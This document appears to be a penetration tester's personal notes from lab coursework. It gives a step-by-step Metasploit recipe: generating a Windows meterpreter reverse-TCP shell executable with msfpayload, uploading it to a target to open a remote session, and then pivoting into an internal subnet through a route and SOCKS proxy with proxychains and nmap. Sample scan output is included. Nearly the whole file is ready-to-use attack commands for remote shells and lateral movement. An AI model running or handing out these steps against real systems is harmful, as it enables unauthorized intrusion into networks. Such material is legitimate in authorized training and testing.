# hosts list from input file
set rhosts file:/home/dan/PWK/scripts/recon_scan/ftp.txt 

# cheat sheet

https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20Meterpreter%20Cheat%20%20Sheet.pdf

## to create payload for execution on host and establish meterpreter sessions
# 1 Create window payload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.xx.xx LPORT=4444 X > /home/dan/PWK/upload_tools/win_meterpreter_shell.exe

# 2 upload .exe to host using ftp/nc/tftp etc

# 3 Establish multi-handler listener by lauching .exe

# 4 To allow scanning via proxy using meterpreter session, put session to background

meterpreter > background
msf > sessions l
msf > route add 192.168.17.0 255.255.255.0 <session number>

# 5 add SOCKS proxy

msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > set SRVHOST 127.0.0.1
msf auxiliary(socks4a) > set SRVPORT 1001
msf auxiliary(socks4a) > run

# 6 Update proxychains config

socks4  127.0.0.1 1001

# 7 run tools via proxychains

proxychains nmap -sV --top-ports 1000 192.168.17.x

Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-21 21:46 PDT
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.17.xxx:21-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.17.xxx:80-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.17.xxx:3389-<><>-OK






